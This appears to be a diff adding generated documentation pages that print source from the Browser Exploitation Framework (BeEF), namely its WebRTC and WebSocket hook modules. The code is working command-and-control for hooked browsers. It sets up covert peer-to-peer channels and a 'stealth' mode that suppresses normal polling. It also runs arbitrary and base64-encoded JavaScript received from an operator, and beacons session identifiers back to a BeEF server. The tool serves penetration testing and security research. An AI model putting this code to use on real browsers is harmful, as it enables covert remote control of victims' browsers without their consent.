// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Manage the WebRTC peer to peer communication channels.
* This objects contains all the necessary client-side WebRTC components,
* allowing browsers to use WebRTC to communicate with each other.
* To provide signaling, the WebRTC extension sets up custom listeners.
* /rtcsignal - for sending RTC signalling information between peers
* /rtcmessage - for client-side rtc messages to be submitted back into beef and logged.
*
* To ensure signaling gets back to the peers, the hook.js dynamic construction also includes
* the signalling.
*
* This is all mostly a Proof of Concept
* @namespace beef.webrtc
*/
/**
* To handle multiple peers - we need to have a hash of Beefwebrtc objects. The key is the peer id.
* @memberof beef.webrtc
*/
beefrtcs = {};
/**
* To handle multiple Peers - we have to have a global hash of RTCPeerConnection objects
* these objects persist outside of everything else. The key is the peer id.
* @memberof beef.webrtc
*/
globalrtc = {};
/**
* stealth should only be initiated from one peer - this global variable will contain:
* false - i.e not stealthed; or
* &lt;peerid> - i.e. the id of the browser which initiated stealth mode
* @memberof beef.webrtc
*/
rtcstealth = false;
/**
* To handle multiple event channels - we need to have a global hash of these. The key is the peer id
* @memberof beef.webrtc
*/
rtcrecvchan = {};
/**
* Beefwebrtc object - wraps everything together for a peer connection
* One of these per peer connection, and will be stored in the beefrtc global hash
* @memberof beef.webrtc
* @param initiator
* @param peer
* @param turnjson
* @param stunservers
* @param verbparam
*/
function Beefwebrtc(initiator,peer,turnjson,stunservers,verbparam) {
this.verbose = typeof verbparam !== 'undefined' ? verbparam : false; // whether this object is verbose or not
this.initiator = typeof initiator !== 'undefined' ? initiator : 0; // if 1 - this is the caller; if 0 - this is the receiver
this.peerid = typeof peer !== 'undefined' ? peer : null; // id of this rtc peer
this.turnjson = turnjson; // set of TURN servers in the format:
// {"username": "&lt;username", "password": "&lt;password>", "uris": [
// "turn:&lt;ip>:&lt;port>?transport=&lt;udp/tcp>",
// "turn:&lt;ip>:&lt;port>?transport=&lt;udp/tcp>"]}
this.started = false; // Has signaling / dialing started for this peer
this.gotanswer = false; // For the caller - this determines whether they have received an SDP answer from the receiver
this.turnDone = false; // does the pcConfig have TURN servers added to it?
this.signalingReady = false; // the initiator (Caller) is always ready to signal. So this sets to true during init
// the receiver will set this to true once it receives an SDP 'offer'
this.msgQueue = []; // because the handling of SDP signals may happen in any order - we need a queue for them
this.pcConfig = null; // We set this during init
this.pcConstraints = {"optional": [{"googImprovedWifiBwe": true}]} // PeerConnection constraints
this.offerConstraints = {"optional": [], "mandatory": {}}; // Default SDP Offer Constraints - used in the caller
this.sdpConstraints = {'optional': [{'RtpDataChannels':true}]}; // Default SDP Constraints - used by caller and receiver
this.gatheredIceCandidateTypes = { Local: {}, Remote: {} }; // ICE Candidates
this.allgood = false; // Is this object / peer connection with the nominated peer ready to go?
this.dataChannel = null; // The data channel used by this peer
this.stunservers = stunservers; // set of STUN servers, in the format:
// ["stun:stun.l.google.com:19302","stun:stun1.l.google.com:19302"]
}
/**
* Initialize the object
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.initialize = function() {
if (this.peerid == null) {
return 0; // no peerid - NO DICE
}
// Initialise the pcConfig hash with the provided stunservers
var stuns = JSON.parse(this.stunservers);
this.pcConfig = {"iceServers": [{"urls":stuns, "username":"user",
"credential":"pass"}]};
// We're not getting the browsers to request their own TURN servers, we're specifying them through BeEF
// this.forceTurn(this.turnjson);
this.turnDone = true;
// Caller is always ready to create peerConnection.
this.signalingReady = this.initiator;
// Start .. maybe
this.maybeStart();
// If the window is closed, send a signal to beef .. this is not all that great, so just commenting out
// window.onbeforeunload = function() {
// this.sendSignalMsg({type: 'bye'});
// }
return 1; // because .. yeah .. we had a peerid - this is good yar.
}
/**
* Forces the TURN configuration (we can't query that computeengine thing because it's CORS is restrictive)
* These values are now simply passed in from the config.yaml for the webrtc extension
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.forceTurn = function(jason) {
var turnServer = JSON.parse(jason);
var iceServers = createIceServers(turnServer.uris,
turnServer.username,
turnServer.password);
if (iceServers !== null) {
this.pcConfig.iceServers = this.pcConfig.iceServers.concat(iceServers);
}
beef.debug("Got TURN servers, will try and maybestart again..");
this.turnDone = true;
this.maybeStart();
}
/**
* Try and establish the RTC connection
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.createPeerConnection = function() {
beef.debug('Creating RTCPeerConnnection with the following options:\n' +
' config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
' constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
try {
// Create an RTCPeerConnection via the polyfill (webrtcadapter.js).
globalrtc[this.peerid] = new RTCPeerConnection(this.pcConfig, this.pcConstraints);
globalrtc[this.peerid].onicecandidate = this.onIceCandidate;
beef.debug('Created RTCPeerConnnection with the following options:\n' +
' config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
' constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
} catch (e) {
beef.debug('Failed to create PeerConnection, exception: ');
beef.debug(e);
return;
}
// Assign event handlers to signalstatechange, iceconnectionstatechange, datachannel etc
globalrtc[this.peerid].onsignalingstatechange = this.onSignalingStateChanged;
globalrtc[this.peerid].oniceconnectionstatechange = this.onIceConnectionStateChanged;
globalrtc[this.peerid].ondatachannel = this.onDataChannel;
this.dataChannel = globalrtc[this.peerid].createDataChannel("sendDataChannel", {reliable:false});
}
/**
* When the PeerConnection receives a new ICE Candidate
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onIceCandidate = function(event) {
var peerid = null;
for (var k in beefrtcs) {
if (beefrtcs[k].allgood === false) {
peerid = beefrtcs[k].peerid;
}
}
beef.debug("Handling onicecandidate event while connecting to peer: " + peerid + ". Event received:");
beef.debug(event);
if (event.candidate) {
// Send the candidate to the peer via the BeEF signalling channel
beefrtcs[peerid].sendSignalMsg({type: 'candidate',
label: event.candidate.sdpMLineIndex,
id: event.candidate.sdpMid,
candidate: event.candidate.candidate});
// Note this ICE candidate locally
beefrtcs[peerid].noteIceCandidate("Local", beefrtcs[peerid].iceCandidateType(event.candidate.candidate));
} else {
beef.debug('End of candidates.');
}
}
/**
* For all rtc signalling messages we receive as part of hook.js polling - we have to process them with this function
* This will either add messages to the msgQueue and try and kick off maybeStart - or it'll call processSignalingMessage
* against the message directly
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.processMessage = function(message) {
beef.debug('Signalling Message - S->C: ' + JSON.stringify(message));
var msg = JSON.parse(message);
if (!this.initiator &amp;&amp; !this.started) { // We are currently the receiver AND we have NOT YET received an SDP Offer
beef.debug('processing the message, as a receiver');
if (msg.type === 'offer') { // This IS an SDP Offer
beef.debug('.. and the message is an offer .. ');
this.msgQueue.unshift(msg); // put it on the top of the msgqueue
this.signalingReady = true; // As the receiver, we've now got an SDP Offer, so lets set signalingReady to true
this.maybeStart(); // Lets try and start again - this will end up with calleeStart() getting executed
} else { // This is NOT an SDP Offer - as the receiver, just add it to the queue
beef.debug(' .. the message is NOT an offer .. ');
this.msgQueue.push(msg);
}
} else if (this.initiator &amp;&amp; !this.gotanswer) { // We are currently the caller AND we have NOT YET received the SDP Answer
beef.debug('processing the message, as the sender, no answers yet');
if (msg.type === 'answer') { // This IS an SDP Answer
beef.debug('.. and we have an answer ..');
this.processSignalingMessage(msg); // Process the message directly
this.gotanswer = true; // We have now received an answer
//process all other queued message...
while (this.msgQueue.length > 0) {
this.processSignalingMessage(this.msgQueue.shift());
}
} else { // This is NOT an SDP Answer - as the caller, just add it to the queue
beef.debug('.. not an answer ..');
this.msgQueue.push(msg);
}
} else { // For all other messages just drop them in the queue
beef.debug('processing a message, but, not as a receiver, OR, the rtc is already up');
this.processSignalingMessage(msg);
}
}
/**
* Send a signalling message ..
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.sendSignalMsg = function(message) {
var msgString = JSON.stringify(message);
beef.debug('Signalling Message - C->S: ' + msgString);
beef.net.send('/rtcsignal',0,{targetbeefid: this.peerid, signal: msgString});
}
/**
* Used to record ICS candidates locally
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.noteIceCandidate = function(location, type) {
if (this.gatheredIceCandidateTypes[location][type])
return;
this.gatheredIceCandidateTypes[location][type] = 1;
// updateInfoDiv();
}
/**
* When the signalling state changes. We don't actually do anything with this except log it.
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onSignalingStateChanged = function(event) {
beef.debug("Signalling has changed to: " + event.target.signalingState);
}
/**
* When the ICE Connection State changes - this is useful to determine connection statuses with peers.
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onIceConnectionStateChanged = function(event) {
var peerid = null;
for (k in globalrtc) {
if ((globalrtc[k].localDescription.sdp === event.target.localDescription.sdp) &amp;&amp; (globalrtc[k].localDescription.type === event.target.localDescription.type)) {
peerid = k;
}
}
beef.debug("ICE with peer: " + peerid + " has changed to: " + event.target.iceConnectionState);
// ICE Connection Status has connected - this is good. Normally means the RTCPeerConnection is ready! Although may still look for
// better candidates or connections
if (event.target.iceConnectionState === 'connected') {
//Send status to peer
window.setTimeout(function() {
beefrtcs[peerid].sendPeerMsg('ICE Status: '+event.target.iceConnectionState);
beefrtcs[peerid].allgood = true;
},1000);
}
// Completed is similar to connected. Except, each of the ICE components are good, and no more testing remote candidates is done.
if (event.target.iceConnectionState === 'completed') {
window.setTimeout(function() {
beefrtcs[peerid].sendPeerMsg('ICE Status: '+event.target.iceConnectionState);
beefrtcs[peerid].allgood = true;
},1000);
}
if ((rtcstealth == peerid) &amp;&amp; (event.target.iceConnectionState === 'disconnected')) {
//I was in stealth mode, talking back to this peer - but it's gone offline.. come out of stealth
rtcstealth = false;
beefrtcs[peerid].allgood = false;
beef.net.send('/rtcmessage',0,{peerid: peerid, message: peerid + " - has apparently gotten disconnected"});
} else if ((rtcstealth == false) &amp;&amp; (event.target.iceConnectionState === 'disconnected')) {
//I was not in stealth, and this peer has gone offline - send a message
beefrtcs[peerid].allgood = false;
beef.net.send('/rtcmessage',0,{peerid: peerid, message: peerid + " - has apparently gotten disconnected"});
}
// We don't handle situations where a stealthed peer loses a peer that is NOT the peer that made it go into stealth
// This is possibly a bad idea - @xntrik
}
/**
* This is the function when a peer tells us to go into stealth by sending a dataChannel message of "!gostealth"
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.goStealth = function() {
//stop the beef updater
rtcstealth = this.peerid; // this is a global variable
beef.updater.lock = true;
this.sendPeerMsg('Going into stealth mode');
setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 5);
}
/**
* This is the actual poller when in stealth, it is global as well because we're using the setTimeout to execute it
* @memberof beef.webrtc
*/
rtcpollPeer = function() {
if (rtcstealth == false) {
//my peer has disabled stealth mode
beef.updater.lock = false;
return;
}
beef.debug('lub dub');
beefrtcs[rtcstealth].sendPeerMsg('Stayin alive'); // This is the heartbeat we send back to the peer that made us stealth
setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 5);
}
/**
* When a data channel has been established - within here is the message handling function as well
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onDataChannel = function(event) {
var peerid = null;
for (k in globalrtc) {
if ((globalrtc[k].localDescription.sdp === event.currentTarget.localDescription.sdp) &amp;&amp; (globalrtc[k].localDescription.type === event.currentTarget.localDescription.type)) {
peerid = k;
}
}
beef.debug("Peer: " + peerid + " has just handled the onDataChannel event");
rtcrecvchan[peerid] = event.channel;
// This is the onmessage event handling within the datachannel
rtcrecvchan[peerid].onmessage = function(ev2) {
beef.debug("Received an RTC message from my peer["+peerid+"]: " + ev2.data);
// We've received the command to go into stealth mode
if (ev2.data == "!gostealth") {
if (beef.updater.lock == true) {
setTimeout(function() {beefrtcs[peerid].goStealth()},beef.updater.xhr_poll_timeout * 0.4);
} else {
beefrtcs[peerid].goStealth();
}
// The message to come out of stealth
} else if (ev2.data == "!endstealth") {
if (rtcstealth != null) {
beefrtcs[rtcstealth].sendPeerMsg("Coming out of stealth...");
rtcstealth = false;
}
// Command to perform arbitrary JS (while stealthed)
} else if ((rtcstealth != false) &amp;&amp; (ev2.data.charAt(0) == "%")) {
beef.debug('message was a command: '+ev2.data.substring(1) + ' .. and I am in stealth mode');
beefrtcs[rtcstealth].sendPeerMsg("Command result - " + beefrtcs[rtcstealth].execCmd(ev2.data.substring(1)));
// Command to perform arbitrary JS (while NOT stealthed)
} else if ((rtcstealth == false) &amp;&amp; (ev2.data.charAt(0) == "%")) {
beef.debug('message was a command - we are not in stealth. Command: '+ ev2.data.substring(1));
beefrtcs[peerid].sendPeerMsg("Command result - " + beefrtcs[peerid].execCmd(ev2.data.substring(1)));
// B64d command from the /cmdexec API
} else if (ev2.data.charAt(0) == "@") {
beef.debug('message was a b64d command');
var fn = new Function(atob(ev2.data.substring(1)));
fn();
if (rtcstealth != false) { // force stealth back on ?
beef.updater.execute_commands(); // FORCE execution while stealthed
beef.updater.lock = true;
}
// Just a plain text message .. (while stealthed)
} else if (rtcstealth != false) {
beef.debug('received a message, apparently we are in stealth - so just send it back to peer['+rtcstealth+']');
beefrtcs[rtcstealth].sendPeerMsg(ev2.data);
// Just a plan text message (while NOT stealthed)
} else {
beef.debug('received a message from peer['+peerid+'] - sending it back to beef');
beef.net.send('/rtcmessage',0,{peerid: peerid, message: ev2.data});
}
}
}
/**
* How the browser executes received JS (this is pretty hacky)
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.execCmd = function(input) {
var fn = new Function(input);
var res = fn();
return res.toString();
}
/**
* Shortcut function to SEND a data messsage
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.sendPeerMsg = function(msg) {
beef.debug('sendPeerMsg to ' + this.peerid);
this.dataChannel.send(msg);
}
/**
* Try and initiate, will check that system hasn't started, and that signaling is ready, and that TURN servers are ready
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.maybeStart = function() {
beef.debug("maybe starting ... ");
if (!this.started &amp;&amp; this.signalingReady &amp;&amp; this.turnDone) {
beef.debug('Creating PeerConnection.');
this.createPeerConnection();
this.started = true;
if (this.initiator) {
beef.debug("Making the call now .. bzz bzz");
this.doCall();
} else {
beef.debug("Receiving a call now .. somebuddy answer da fone?");
this.calleeStart();
}
} else {
beef.debug("Not ready to start just yet..");
}
}
/**
* RTC - create an offer - the caller runs this, while the receiver runs calleeStart()
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.doCall = function() {
var constraints = this.mergeConstraints(this.offerConstraints, this.sdpConstraints);
var self = this;
globalrtc[this.peerid].createOffer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, constraints);
beef.debug('Sending offer to peer, with constraints: \n' +
' \'' + JSON.stringify(constraints) + '\'.');
}
/**
* Helper method to merge SDP constraints
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.mergeConstraints = function(cons1, cons2) {
var merged = cons1;
for (var name in cons2.mandatory) {
merged.mandatory[name] = cons2.mandatory[name];
}
merged.optional.concat(cons2.optional);
return merged;
}
/**
* Sets the local RTC session description, sends this information back (via signalling)
* The caller uses this to set it's local description, and it then has to send this to the peer (via signalling)
* The receiver uses this information too - and vice-versa - hence the signaling
*
*/
Beefwebrtc.prototype.setLocalAndSendMessage = function(sessionDescription) {
var peerid = null;
for (var k in beefrtcs) {
if (beefrtcs[k].allgood === false) {
peerid = beefrtcs[k].peerid;
}
}
beef.debug("For peer: " + peerid + " Running setLocalAndSendMessage...");
globalrtc[peerid].setLocalDescription(sessionDescription, onSetSessionDescriptionSuccess, onSetSessionDescriptionError);
beefrtcs[peerid].sendSignalMsg(sessionDescription);
function onSetSessionDescriptionSuccess() {
beef.debug('Set session description success.');
}
function onSetSessionDescriptionError() {
beef.debug('Failed to set session description');
}
}
/**
* If the browser can't build an SDP
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onCreateSessionDescriptionError = function(error) {
beef.debug('Failed to create session description: ' + error.toString());
}
/**
* If the browser successfully sets a remote description
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onSetRemoteDescriptionSuccess = function() {
beef.debug('Set remote session description successfully');
}
/**
* Check for messages - which includes signaling from a calling peer - this gets kicked off in maybeStart()
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.calleeStart = function() {
// Callee starts to process cached offer and other messages.
while (this.msgQueue.length > 0) {
this.processSignalingMessage(this.msgQueue.shift());
}
}
/**
* Process messages, this is how we handle the signaling messages, such as candidate info, offers, answers
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.processSignalingMessage = function(message) {
if (!this.started) {
beef.debug('peerConnection has not been created yet!');
return;
}
if (message.type === 'offer') {
beef.debug("Processing signalling message: OFFER");
if (navigator.mozGetUserMedia) { // Mozilla shim fuckn shit - since the new
// version of FF - which no longer works
beef.debug("Moz shim here");
globalrtc[this.peerid].setRemoteDescription(
new RTCSessionDescription(message),
function() {
// globalrtc[this.peerid].createAnswer(function(answer) {
// globalrtc[this.peerid].setLocalDescription(
var peerid = null;
for (var k in beefrtcs) {
if (beefrtcs[k].allgood === false) {
peerid = beefrtcs[k].peerid;
}
}
globalrtc[peerid].createAnswer(function(answer) {
globalrtc[peerid].setLocalDescription(
new RTCSessionDescription(answer),
function() {
beefrtcs[peerid].sendSignalMsg(answer);
},function(error) {
beef.debug("setLocalDescription error: " + error);
});
},function(error) {
beef.debug("createAnswer error: " +error);
});
},function(error) {
beef.debug("setRemoteDescription error: " + error);
});
} else {
this.setRemote(message);
this.doAnswer();
}
} else if (message.type === 'answer') {
beef.debug("Processing signalling message: ANSWER");
if (navigator.mozGetUserMedia) { // terrible moz shim - as for the offer
beef.debug("Moz shim here");
globalrtc[this.peerid].setRemoteDescription(
new RTCSessionDescription(message),
function() {},
function(error) {
beef.debug("setRemoteDescription error: " + error);
});
} else {
this.setRemote(message);
}
} else if (message.type === 'candidate') {
beef.debug("Processing signalling message: CANDIDATE");
var candidate = new RTCIceCandidate({sdpMLineIndex: message.label,
candidate: message.candidate});
this.noteIceCandidate("Remote", this.iceCandidateType(message.candidate));
globalrtc[this.peerid].addIceCandidate(candidate, this.onAddIceCandidateSuccess, this.onAddIceCandidateError);
} else if (message.type === 'bye') {
this.onRemoteHangup();
}
}
/**
* Used to set the RTC remote session
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.setRemote = function(message) {
globalrtc[this.peerid].setRemoteDescription(new RTCSessionDescription(message),
this.onSetRemoteDescriptionSuccess, this.onSetSessionDescriptionError);
}
/**
* As part of the processSignalingMessage function, we check for 'offers' from peers. If there's an offer, we answer, as below
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.doAnswer = function() {
beef.debug('Sending answer to peer.');
globalrtc[this.peerid].createAnswer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, this.sdpConstraints);
}
/**
* Helper method to determine what kind of ICE Candidate we've received
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.iceCandidateType = function(candidateSDP) {
if (candidateSDP.indexOf("typ relay ") >= 0)
return "TURN";
if (candidateSDP.indexOf("typ srflx ") >= 0)
return "STUN";
if (candidateSDP.indexOf("typ host ") >= 0)
return "HOST";
return "UNKNOWN";
}
/**
* Event handler for successful addition of ICE Candidates
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onAddIceCandidateSuccess = function() {
beef.debug('AddIceCandidate success.');
}
/**
* Event handler for unsuccessful addition of ICE Candidates
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onAddIceCandidateError = function(error) {
beef.debug('Failed to add Ice Candidate: ' + error.toString());
}
/**
* If a peer hangs up (we bring down the peerconncetion via the stop() method)
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.onRemoteHangup = function() {
beef.debug('Session terminated.');
this.initiator = 0;
// transitionToWaiting();
this.stop();
}
/**
* Bring down the peer connection
* @memberof beef.webrtc
*/
Beefwebrtc.prototype.stop = function() {
this.started = false; // we're no longer started
this.signalingReady = false; // signalling isn't ready
globalrtc[this.peerid].close(); // close the RTCPeerConnection option
globalrtc[this.peerid] = null; // Remove it
this.msgQueue.length = 0; // clear the msgqueue
rtcstealth = false; // no longer stealth
this.allgood = false; // allgood .. NAH UH
}
/**
* The actual beef.webrtc wrapper - this exposes only two functions directly - start, and status
* These are the methods which are executed via the custom extension of the hook.js
* @memberof beef.webrtc
*/
beef.webrtc = {
// Start the RTCPeerConnection process
start: function(initiator,peer,turnjson,stunservers,verbose) {
if (peer in beefrtcs) {
// If the RTC peer is not in a good state, try kickng it off again
// This is possibly not the correct way to handle this issue though :/ I.e. we'll now have TWO of these objects :/
if (beefrtcs[peer].allgood == false) {
beefrtcs[peer] = new Beefwebrtc(initiator, peer, turnjson, stunservers, verbose);
beefrtcs[peer].initialize();
}
} else {
// Standard behaviour for new peer connections
beefrtcs[peer] = new Beefwebrtc(initiator,peer,turnjson, stunservers, verbose);
beefrtcs[peer].initialize();
}
},
// Check the status of all my peers ..
status: function(me) {
if (Object.keys(beefrtcs).length > 0) {
for (var k in beefrtcs) {
if (beefrtcs.hasOwnProperty(k)) {
beef.net.send('/rtcmessage',0,{peerid: k, message: "Status checking - allgood: " + beefrtcs[k].allgood});
}
}
} else {
beef.net.send('/rtcmessage',0,{peerid: me, message: "No peers?"});
}
}
}
beef.regCmp('beef.webrtc');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

142
docs/websocket.js.html Normal file
View File

@@ -0,0 +1,142 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: websocket.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: websocket.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Manage the WebSocket communication channel.
* This channel is much faster and responsive, and it's used automatically
* if the browser supports WebSockets AND beef.http.websocket.enable = true.
* @namespace beef.websocket
*/
beef.websocket = {
socket:null,
ws_poll_timeout: "&lt;%= @ws_poll_timeout %>",
ws_connect_timeout: "&lt;%= @ws_connect_timeout %>",
/**
* Initialize the WebSocket client object.
* Note: use WebSocketSecure only if the hooked origin is under https.
* Mixed-content in WS is quite different from a non-WS context.
*/
init:function () {
var webSocketServer = beef.net.host;
var webSocketPort = "&lt;%= @websocket_port %>";
var webSocketSecure = "&lt;%= @websocket_secure %>";
var protocol = "ws://";
if(webSocketSecure &amp;&amp; window.location.protocol=="https:"){
protocol = "wss://";
webSocketPort= "&lt;%= @websocket_sec_port %>";
}
if (beef.browser.isFF() &amp;&amp; !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
}else{
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
}
},
/**
* Send Helo message to the BeEF server and start async polling.
*/
start:function () {
new beef.websocket.init();
this.socket.onopen = function () {
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
beef.websocket.alive();
};
this.socket.onmessage = function (message) {
// Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
// That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
// It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
new Function(message.data)();
};
this.socket.onclose = function () {
setTimeout(function(){beef.websocket.start()}, 5000);
};
},
/**
* Send data back to BeEF. This is basically the same as beef.net.send,
* but doesn't queue commands.
* Example usage:
* beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
* '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
* '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
*/
send:function (data) {
try {
this.socket.send(data);
}catch(err){}
},
/**
* Polling mechanism, to notify the BeEF server that the browser is still hooked,
* and the WebSocket channel still alive.
* todo: there is probably a more efficient way to do this. Double-check WebSocket API.
*/
alive: function (){
beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
setTimeout("beef.websocket.alive()", parseInt(beef.websocket.ws_poll_timeout));
}
};
beef.regCmp('beef.websocket');</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>